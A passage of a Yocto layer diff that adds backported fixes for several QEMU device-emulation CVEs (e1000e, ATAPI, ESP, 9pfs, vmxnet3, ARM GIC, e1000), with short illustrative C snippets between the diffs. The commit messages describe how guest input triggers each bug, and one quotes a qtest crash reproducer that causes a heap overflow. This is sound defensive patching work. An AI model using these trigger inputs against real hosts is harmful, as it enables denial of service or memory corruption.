+ * decode to completely different MemoryRegions. When such registers
+ * exist (e.g. I/O ports 0xcf8 and 0xcf9 on most PC chipsets), MMIO
+ * regions overlap wildly. For this reason we cannot clamp the accesses
+ * here.
+ *
+ * If the length is small (as is the case for address_space_ldl/stl),
+ * everything works fine. If the incoming length is large, however,
+ * the caller really has to do the clamping through memory_access_size.
+ */
+
+address_space_cache_init is exactly one such case where "the incoming length
+is large", therefore we need to clamp the resulting length---not to
+memory_access_size though, since we are not doing an access yet, but to
+the size of the resulting section. This ensures that subsequent accesses
+to the cached MemoryRegionSection will be in range.
+
+With this patch, the enclosed testcase notices that the used ring does
+not fit into the MSI-X table and prints a "qemu-system-x86_64: Cannot map used"
+error.
+
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+---
+ exec.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/exec.c b/exec.c
+index 2d6add46..1360051a 100644
+--- a/exec.c
++++ b/exec.c
+@@ -3632,6 +3632,7 @@ int64_t address_space_cache_init(MemoryRegionCache *cache,
+ AddressSpaceDispatch *d;
+ hwaddr l;
+ MemoryRegion *mr;
++ Int128 diff;
+
+ assert(len > 0);
+
+@@ -3640,6 +3641,15 @@ int64_t address_space_cache_init(MemoryRegionCache *cache,
+ d = flatview_to_dispatch(cache->fv);
+ cache->mrs = *address_space_translate_internal(d, addr, &cache->xlat, &l, true);
+
++ /*
++ * cache->xlat is now relative to cache->mrs.mr, not to the section itself.
++ * Take that into account to compute how many bytes are there between
++ * cache->xlat and the end of the section.
++ */
++ diff = int128_sub(cache->mrs.size,
++ int128_make64(cache->xlat - cache->mrs.offset_within_region));
++ l = int128_get64(int128_min(diff, int128_make64(l)));
++
+ mr = cache->mrs.mr;
+ memory_region_ref(mr);
+ if (memory_access_is_direct(mr, is_write)) {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch
new file mode 100644
index 0000000000..756b1c1495
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch
@@ -0,0 +1,48 @@
+From c2cb511634012344e3d0fe49a037a33b12d8a98a Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Wed, 11 Nov 2020 18:36:36 +0530
+Subject: [PATCH] hw/net/e1000e: advance desc_offset in case of null descriptor
+
+While receiving packets via e1000e_write_packet_to_guest() routine,
+'desc_offset' is advanced only when RX descriptor is processed. And
+RX descriptor is not processed if it has NULL buffer address.
+This may lead to an infinite loop condition. Increment 'desc_offset'
+to process next descriptor in the ring to avoid infinite loop.
+
+Reported-by: Cheol-woo Myung <330cjfdn@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-28916
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/net/e1000e_core.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/hw/net/e1000e_core.c b/hw/net/e1000e_core.c
+index d8b9e4b2f4..095c01ebc6 100644
+--- a/hw/net/e1000e_core.c
++++ b/hw/net/e1000e_core.c
+@@ -1596,13 +1596,13 @@ e1000e_write_packet_to_guest(E1000ECore *core, struct NetRxPkt *pkt,
+ (const char *) &fcs_pad, e1000x_fcs_len(core->mac));
+ }
+ }
+- desc_offset += desc_size;
+- if (desc_offset >= total_size) {
+- is_last = true;
+- }
+ } else { /* as per intel docs; skip descriptors with null buf addr */
+ trace_e1000e_rx_null_descriptor();
+ }
++ desc_offset += desc_size;
++ if (desc_offset >= total_size) {
++ is_last = true;
++ }
+
+ e1000e_write_rx_descr(core, desc, is_last ? core->rx_pkt : NULL,
+ rss_info, do_ps ? ps_hdr_len : 0, &bastate.written);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch
new file mode 100644
index 0000000000..1528d5c2fd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch
@@ -0,0 +1,45 @@
+From 813212288970c39b1800f63e83ac6e96588095c6 Mon Sep 17 00:00:00 2001
+From: Paolo Bonzini <pbonzini@redhat.com>
+Date: Tue, 1 Dec 2020 13:09:26 +0100
+Subject: [PATCH] ide: atapi: assert that the buffer pointer is in range
+
+A case was reported where s->io_buffer_index can be out of range.
+The report skimped on the details but it seems to be triggered
+by s->lba == -1 on the READ/READ CD paths (e.g. by sending an
+ATAPI command with LBA = 0xFFFFFFFF). For now paper over it
+with assertions. The first one ensures that there is no overflow
+when incrementing s->io_buffer_index, the second checks for the
+buffer overrun.
+
+Note that the buffer overrun is only a read, so I am not sure
+if the assertion failure is actually less harmful than the overrun.
+
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+Message-id: 20201201120926.56559-1-pbonzini@redhat.com
+Reviewed-by: Kevin Wolf <kwolf@redhat.com>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-29443
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/ide/atapi.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/hw/ide/atapi.c b/hw/ide/atapi.c
+index 14a2b0bb2f..e79157863f 100644
+--- a/hw/ide/atapi.c
++++ b/hw/ide/atapi.c
+@@ -276,6 +276,8 @@ void ide_atapi_cmd_reply_end(IDEState *s)
+ s->packet_transfer_size -= size;
+ s->elementary_transfer_size -= size;
+ s->io_buffer_index += size;
++ assert(size <= s->io_buffer_total_len);
++ assert(s->io_buffer_index <= s->io_buffer_total_len);
+
+ /* Some adapters process PIO data right away. In that case, we need
+ * to avoid mutual recursion between ide_transfer_start
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch
new file mode 100644
index 0000000000..97d32589d8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch
@@ -0,0 +1,51 @@
+Backport of:
+
+From 0db895361b8a82e1114372ff9f4857abea605701 Mon Sep 17 00:00:00 2001
+From: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Date: Wed, 7 Apr 2021 20:57:50 +0100
+Subject: [PATCH] esp: always check current_req is not NULL before use in DMA
+ callbacks
+
+After issuing a SCSI command the SCSI layer can call the SCSIBusInfo .cancel
+callback which resets both current_req and current_dev to NULL. If any data
+is left in the transfer buffer (async_len != 0) then the next TI (Transfer
+Information) command will attempt to reference the NULL pointer causing a
+segfault.
+
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910723
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
+Signed-off-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20210407195801.685-2-mark.cave-ayland@ilande.co.uk>
+
+CVE: CVE-2020-35504
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-35504.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/0db895361b8a82e1114372ff9f4857abea605701 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/esp.c | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+
+--- a/hw/scsi/esp.c
++++ b/hw/scsi/esp.c
+@@ -362,6 +362,11 @@ static void do_dma_pdma_cb(ESPState *s)
+ do_cmd(s, s->cmdbuf);
+ return;
+ }
++
++ if (!s->current_req) {
++ return;
++ }
++
+ s->dma_left -= len;
+ s->async_buf += len;
+ s->async_len -= len;
+@@ -415,6 +420,9 @@ static void esp_do_dma(ESPState *s)
+ do_cmd(s, s->cmdbuf);
+ return;
+ }
++ if (!s->current_req) {
++ return;
++ }
+ if (s->async_len == 0) {
+ /* Defer until data is available. */
+ return;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch
new file mode 100644
index 0000000000..40c0b1e74f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch
@@ -0,0 +1,45 @@
+Backport of:
+
+From 99545751734035b76bd372c4e7215bb337428d89 Mon Sep 17 00:00:00 2001
+From: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Date: Wed, 7 Apr 2021 20:57:55 +0100
+Subject: [PATCH] esp: ensure cmdfifo is not empty and current_dev is non-NULL
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+When about to execute a SCSI command, ensure that cmdfifo is not empty and
+current_dev is non-NULL. This can happen if the guest tries to execute a TI
+(Transfer Information) command without issuing one of the select commands
+first.
+
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910723
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
+Signed-off-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20210407195801.685-7-mark.cave-ayland@ilande.co.uk>
+
+CVE: CVE-2020-35505
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-35505.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/99545751734035b76bd372c4e7215bb337428d89 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+Signed-off-by: Emily Vekariya <emily.vekariya@einfochips.com>
+---
+ hw/scsi/esp.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/scsi/esp.c b/hw/scsi/esp.c
+index c7d701bf..c2a67bc8 100644
+--- a/hw/scsi/esp.c
++++ b/hw/scsi/esp.c
+@@ -193,6 +193,10 @@ static void do_busid_cmd(ESPState *s, uint8_t *buf, uint8_t busid)
+
+ trace_esp_do_busid_cmd(busid);
+ lun = busid & 7;
++
++ if (!s->current_dev) {
++ return;
++ }
+ current_lun = scsi_device_find(&s->bus, 0, s->current_dev->id, lun);
+ s->current_req = scsi_req_new(current_lun, 0, lun, buf, s);
+ datalen = scsi_req_enqueue(s->current_req);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch
new file mode 100644
index 0000000000..1b8c77f838
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch
@@ -0,0 +1,81 @@
+From c2d2d14e8deece958bbc4fc649d22c3564bc4e7e Mon Sep 17 00:00:00 2001
+From: Greg Kurz <groug@kaod.org>
+Date: Thu, 14 Jan 2021 17:04:12 +0100
+Subject: [PATCH] 9pfs: Fully restart unreclaim loop (CVE-2021-20181)
+
+Depending on the client activity, the server can be asked to open a huge
+number of file descriptors and eventually hit RLIMIT_NOFILE. This is
+currently mitigated using a reclaim logic : the server closes the file
+descriptors of idle fids, based on the assumption that it will be able
+to re-open them later. This assumption doesn't hold of course if the
+client requests the file to be unlinked. In this case, we loop on the
+entire fid list and mark all related fids as unreclaimable (the reclaim
+logic will just ignore them) and, of course, we open or re-open their
+file descriptors if needed since we're about to unlink the file.
+
+This is the purpose of v9fs_mark_fids_unreclaim(). Since the actual
+opening of a file can cause the coroutine to yield, another client
+request could possibly add a new fid that we may want to mark as
+non-reclaimable as well. The loop is thus restarted if the re-open
+request was actually transmitted to the backend. This is achieved
+by keeping a reference on the first fid (head) before traversing
+the list.
+
+This is wrong in several ways:
+- a potential clunk request from the client could tear the first
+ fid down and cause the reference to be stale. This leads to a
+ use-after-free error that can be detected with ASAN, using a
+ custom 9p client
+- fids are added at the head of the list : restarting from the
+  previous head will always miss fids added by some other
+ potential request
+
+All these problems could be avoided if fids were being added at the
+end of the list. This can be achieved with a QSIMPLEQ, but this is
+probably too much change for a bug fix. For now let's keep it
+simple and just restart the loop from the current head.
+
+Fixes: CVE-2021-20181
+Buglink: https://bugs.launchpad.net/qemu/+bug/1911666
+Reported-by: Zero Day Initiative <zdi-disclosures@trendmicro.com>
+Reviewed-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Reviewed-by: Stefano Stabellini <sstabellini@kernel.org>
+Message-Id: <161064025265.1838153.15185571283519390907.stgit@bahia.lan>
+Signed-off-by: Greg Kurz <groug@kaod.org>
+
+Upstream-Status: Backport [89fbea8737e8f7b954745a1ffc4238d377055305]
+CVE: CVE-2021-20181
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/9pfs/9p.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
+index 94df440fc..6026b51a1 100644
+--- a/hw/9pfs/9p.c
++++ b/hw/9pfs/9p.c
+@@ -502,9 +502,9 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path)
+ {
+ int err;
+ V9fsState *s = pdu->s;
+- V9fsFidState *fidp, head_fid;
++ V9fsFidState *fidp;
+
+- head_fid.next = s->fid_list;
++again:
+ for (fidp = s->fid_list; fidp; fidp = fidp->next) {
+ if (fidp->path.size != path->size) {
+ continue;
+@@ -524,7 +524,7 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path)
+ * switched to the worker thread
+ */
+ if (err == 0) {
+- fidp = &head_fid;
++ goto again;
+ }
+ }
+ }
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch
new file mode 100644
index 0000000000..e9b815740f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch
@@ -0,0 +1,62 @@
+From 94608c59045791dfd35102bc59b792e96f2cfa30 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Tue, 29 Nov 2022 15:57:13 +0530
+Subject: [PATCH] CVE-2021-20196
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/1ab95af033a419e7a64e2d58e67dd96b20af5233]
+CVE: CVE-2021-20196
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+hw/block/fdc: Kludge missing floppy drive to fix CVE-2021-20196
+
+Guest might select another drive on the bus by setting the
+DRIVE_SEL bit of the DIGITAL OUTPUT REGISTER (DOR).
+The current controller model doesn't expect a BlockBackend
+to be NULL. A simple way to fix CVE-2021-20196 is to create
+an empty BlockBackend when it is missing. All further
+accesses will be safely handled, and the controller state
+machines keep behaving correctly.
+---
+ hw/block/fdc.c | 19 ++++++++++++++++++-
+ 1 file changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/hw/block/fdc.c b/hw/block/fdc.c
+index ac5d31e8..e128e975 100644
+--- a/hw/block/fdc.c
++++ b/hw/block/fdc.c
+@@ -58,6 +58,11 @@
+ } \
+ } while (0)
+
++/* Anonymous BlockBackend for empty drive */
++static BlockBackend *blk_create_empty_drive(void)
++{
++ return blk_new(qemu_get_aio_context(), 0, BLK_PERM_ALL);
++}
+
+ /********************************************************/
+ /* qdev floppy bus */
+@@ -1356,7 +1361,19 @@ static FDrive *get_drv(FDCtrl *fdctrl, int unit)
+
+ static FDrive *get_cur_drv(FDCtrl *fdctrl)
+ {
+- return get_drv(fdctrl, fdctrl->cur_drv);
++ FDrive *cur_drv = get_drv(fdctrl, fdctrl->cur_drv);
++
++ if (!cur_drv->blk) {
++ /*
++ * Kludge: empty drive line selected. Create an anonymous
++ * BlockBackend to avoid NULL deref with various BlockBackend
++ * API calls within this model (CVE-2021-20196).
++ * Due to the controller QOM model limitations, we don't
++ * attach the created to the controller device.
++ */
++ cur_drv->blk = blk_create_empty_drive();
++ }
++ return cur_drv;
+ }
+
+ /* Status A register : 0x00 (read-only) */
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch
new file mode 100644
index 0000000000..31440af0bd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch
@@ -0,0 +1,74 @@
+From: Prasad J Pandit <pjp@fedoraproject.org>
+
+While activating device in vmxnet3_activate_device(), it does not
+validate guest supplied configuration values against predefined
+minimum - maximum limits. This may lead to integer overflow or
+OOB access issues. Add checks to avoid it.
+
+Fixes: CVE-2021-20203
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913873
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+
+Upstream-Status: Accepted [https://lists.gnu.org/archive/html/qemu-devel/2021-01/msg07935.html]
+CVE: CVE-2021-20203
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ hw/net/vmxnet3.c | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/hw/net/vmxnet3.c b/hw/net/vmxnet3.c
+index eff299f629..4a910ca971 100644
+--- a/hw/net/vmxnet3.c
++++ b/hw/net/vmxnet3.c
+@@ -1420,6 +1420,7 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ vmxnet3_setup_rx_filtering(s);
+ /* Cache fields from shared memory */
+ s->mtu = VMXNET3_READ_DRV_SHARED32(d, s->drv_shmem, devRead.misc.mtu);
++ assert(VMXNET3_MIN_MTU <= s->mtu && s->mtu < VMXNET3_MAX_MTU);
+ VMW_CFPRN("MTU is %u", s->mtu);
+
+ s->max_rx_frags =
+@@ -1473,6 +1474,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* Read rings memory locations for TX queues */
+ pa = VMXNET3_READ_TX_QUEUE_DESCR64(d, qdescr_pa, conf.txRingBasePA);
+ size = VMXNET3_READ_TX_QUEUE_DESCR32(d, qdescr_pa, conf.txRingSize);
++ if (size > VMXNET3_TX_RING_MAX_SIZE) {
++ size = VMXNET3_TX_RING_MAX_SIZE;
++ }
+
+ vmxnet3_ring_init(d, &s->txq_descr[i].tx_ring, pa, size,
+ sizeof(struct Vmxnet3_TxDesc), false);
+@@ -1483,6 +1487,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* TXC ring */
+ pa = VMXNET3_READ_TX_QUEUE_DESCR64(d, qdescr_pa, conf.compRingBasePA);
+ size = VMXNET3_READ_TX_QUEUE_DESCR32(d, qdescr_pa, conf.compRingSize);
++ if (size > VMXNET3_TC_RING_MAX_SIZE) {
++ size = VMXNET3_TC_RING_MAX_SIZE;
++ }
+ vmxnet3_ring_init(d, &s->txq_descr[i].comp_ring, pa, size,
+ sizeof(struct Vmxnet3_TxCompDesc), true);
+ VMXNET3_RING_DUMP(VMW_CFPRN, "TXC", i, &s->txq_descr[i].comp_ring);
+@@ -1524,6 +1531,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* RX rings */
+ pa = VMXNET3_READ_RX_QUEUE_DESCR64(d, qd_pa, conf.rxRingBasePA[j]);
+ size = VMXNET3_READ_RX_QUEUE_DESCR32(d, qd_pa, conf.rxRingSize[j]);
++ if (size > VMXNET3_RX_RING_MAX_SIZE) {
++ size = VMXNET3_RX_RING_MAX_SIZE;
++ }
+ vmxnet3_ring_init(d, &s->rxq_descr[i].rx_ring[j], pa, size,
+ sizeof(struct Vmxnet3_RxDesc), false);
+ VMW_CFPRN("RX queue %d:%d: Base: %" PRIx64 ", Size: %d",
+@@ -1533,6 +1543,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* RXC ring */
+ pa = VMXNET3_READ_RX_QUEUE_DESCR64(d, qd_pa, conf.compRingBasePA);
+ size = VMXNET3_READ_RX_QUEUE_DESCR32(d, qd_pa, conf.compRingSize);
++ if (size > VMXNET3_RC_RING_MAX_SIZE) {
++ size = VMXNET3_RC_RING_MAX_SIZE;
++ }
+ vmxnet3_ring_init(d, &s->rxq_descr[i].comp_ring, pa, size,
+ sizeof(struct Vmxnet3_RxCompDesc), true);
+ VMW_CFPRN("RXC queue %d: Base: %" PRIx64 ", Size: %d", i, pa, size);
+--
+2.29.2
+
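
For reference, the clamp applied to each guest-supplied ring size above can be
exercised on its own; the snippet below is an illustrative standalone sketch
(RING_MAX_SIZE and clamp_ring_size are made-up names, not QEMU identifiers):

    /* Why an unclamped, guest-controlled ring size is dangerous: the value
     * is later used to size and index fixed-capacity ring bookkeeping, so
     * it must be capped before use. */
    #include <stdint.h>
    #include <stdio.h>

    #define RING_MAX_SIZE 4096u

    static uint32_t clamp_ring_size(uint32_t guest_size)
    {
        return guest_size > RING_MAX_SIZE ? RING_MAX_SIZE : guest_size;
    }

    int main(void)
    {
        uint32_t evil = 0xffffffffu;   /* value read back from guest memory */
        printf("clamped: %u\n", clamp_ring_size(evil));   /* prints 4096 */
        return 0;
    }
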
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch
new file mode 100644
index 0000000000..46c9ab4184
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch
@@ -0,0 +1,67 @@
+From edfe2eb4360cde4ed5d95bda7777edcb3510f76a Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Sun, 31 Jan 2021 11:34:01 +0100
+Subject: [PATCH] hw/intc/arm_gic: Fix interrupt ID in GICD_SGIR register
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Per the ARM Generic Interrupt Controller Architecture specification
+(document "ARM IHI 0048B.b (ID072613)"), the SGIINTID field is 4 bit,
+not 10:
+
+ - 4.3 Distributor register descriptions
+ - 4.3.15 Software Generated Interrupt Register, GICD_SGIR
+
+ - Table 4-21 GICD_SGIR bit assignments
+
+ The Interrupt ID of the SGI to forward to the specified CPU
+ interfaces. The value of this field is the Interrupt ID, in
+ the range 0-15, for example a value of 0b0011 specifies
+ Interrupt ID 3.
+
+Correct the irq mask to fix an undefined behavior (which eventually
+leads to a heap-buffer-overflow, see [Buglink]):
+
+ $ echo 'writel 0x8000f00 0xff4affb0' | qemu-system-aarch64 -M virt,accel=qtest -qtest stdio
+ [I 1612088147.116987] OPENED
+ [R +0.278293] writel 0x8000f00 0xff4affb0
+ ../hw/intc/arm_gic.c:1498:13: runtime error: index 944 out of bounds for type 'uint8_t [16][8]'
+ SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ../hw/intc/arm_gic.c:1498:13
+
+This fixes a security issue when running with KVM on Arm with
+kernel-irqchip=off. (The default is kernel-irqchip=on, which is
+unaffected, and which is also the correct choice for performance.)
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2021-20221
+Fixes: 9ee6e8bb853 ("ARMv7 support.")
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913916
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913917
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Message-id: 20210131103401.217160-1-f4bug@amsat.org
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-20221
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/intc/arm_gic.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/intc/arm_gic.c
+===================================================================
+--- qemu-4.2.0.orig/hw/intc/arm_gic.c
++++ qemu-4.2.0/hw/intc/arm_gic.c
+@@ -1455,7 +1455,7 @@ static void gic_dist_writel(void *opaque
+ int target_cpu;
+
+ cpu = gic_get_current_cpu(s);
+- irq = value & 0x3ff;
++ irq = value & 0xf;
+ switch ((value >> 24) & 3) {
+ case 0:
+ mask = (value >> 16) & ALL_CPU_MASK;
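
For reference, the effect of the mask change can be checked in isolation with
the value from the qtest reproducer quoted above (an illustrative standalone
sketch, not part of the patch):

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
        uint32_t value = 0xff4affb0;              /* GICD_SGIR write from the reproducer */
        printf("old mask: %u\n", value & 0x3ff);  /* 944: out of bounds for the uint8_t[16][8] table */
        printf("new mask: %u\n", value & 0xf);    /* 0: a valid SGI in the 0-15 range */
        return 0;
    }
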
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch
new file mode 100644
index 0000000000..7175b24e99
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch
@@ -0,0 +1,55 @@
+From affdf476543405045c281a7c67d1eaedbcea8135 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:45:28 +0800
+Subject: [PATCH] e1000: fail early for evil descriptor
+
+During process_tx_desc(), the driver can try to chain a data descriptor
+with a legacy descriptor, which will lead to an underflow in the
+following calculation of bytes in process_tx_desc():
+
+ if (tp->size + bytes > msh)
+ bytes = msh - tp->size;
+
+This will lead to an infinite loop. So check and fail early if tp->size
+is greater than or equal to msh.
+
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+Reported-by: Ruhr-University Bochum <bugs-syssec@rub.de>
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [3de46e6fc489c52c9431a8a832ad8170a7569bd8]
+CVE: CVE-2021-20257
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/e1000.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/net/e1000.c b/hw/net/e1000.c
+index cf22c4f07..c3564c7ce 100644
+--- a/hw/net/e1000.c
++++ b/hw/net/e1000.c
+@@ -670,6 +670,9 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
+ msh = tp->tso_props.hdr_len + tp->tso_props.mss;
+ do {
+ bytes = split_size;
++ if (tp->size >= msh) {
++ goto eop;
++ }
+ if (tp->size + bytes > msh)
+ bytes = msh - tp->size;
+
+@@ -695,6 +698,7 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
+ tp->size += split_size;
+ }
+
++eop:
+ if (!(txd_lower & E1000_TXD_CMD_EOP))
+ return;
+ if (!(tp->cptse && tp->size < tp->tso_props.hdr_len)) {
+--
+2.29.2
+
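
For reference, the unsigned wrap-around described in the commit message can be
reproduced in isolation (illustrative values and types, not the QEMU ones):

    #include <stdio.h>

    int main(void)
    {
        unsigned int msh   = 1000;   /* tso hdr_len + mss */
        unsigned int size  = 1200;   /* data already accumulated in tp->size */
        unsigned int bytes = 64;     /* split_size for this iteration */

        if (size + bytes > msh) {
            bytes = msh - size;      /* wraps to a huge value once size > msh */
        }
        printf("bytes = %u\n", bytes);
        return 0;
    }

With size == msh the subtraction yields 0 instead, so the loop makes no
progress either way; bailing out early when tp->size >= msh covers both cases.
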
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch
new file mode 100644
index 0000000000..45b8a4f1dd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch
@@ -0,0 +1,92 @@
+From 3791642c8d60029adf9b00bcb4e34d7d8a1aea4d Mon Sep 17 00:00:00 2001
+From: Michael Tokarev <mjt@tls.msk.ru>
+Date: Mon, 19 Apr 2021 15:42:47 +0200
+Subject: [PATCH] mptsas: Remove unused MPTSASState 'pending' field
+ (CVE-2021-3392)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+While processing SCSI i/o requests in mptsas_process_scsi_io_request(),
+the Megaraid emulator appends new MPTSASRequest object 'req' to
+the 's->pending' queue. In case of an error, this same object gets
+dequeued in mptsas_free_request() only if SCSIRequest object
+'req->sreq' is initialised. This may lead to a use-after-free issue.
+
+Since s->pending is actually not used, simply remove it from
+MPTSASState.
+
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+Message-id: 20210419134247.1467982-1-f4bug@amsat.org
+Message-Id: <20210416102243.1293871-1-mjt@msgid.tls.msk.ru>
+Suggested-by: Paolo Bonzini <pbonzini@redhat.com>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+BugLink: https://bugs.launchpad.net/qemu/+bug/1914236 (CVE-2021-3392)
+Fixes: e351b826112 ("hw: Add support for LSI SAS1068 (mptsas) device")
+[PMD: Reworded description, added more tags]
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
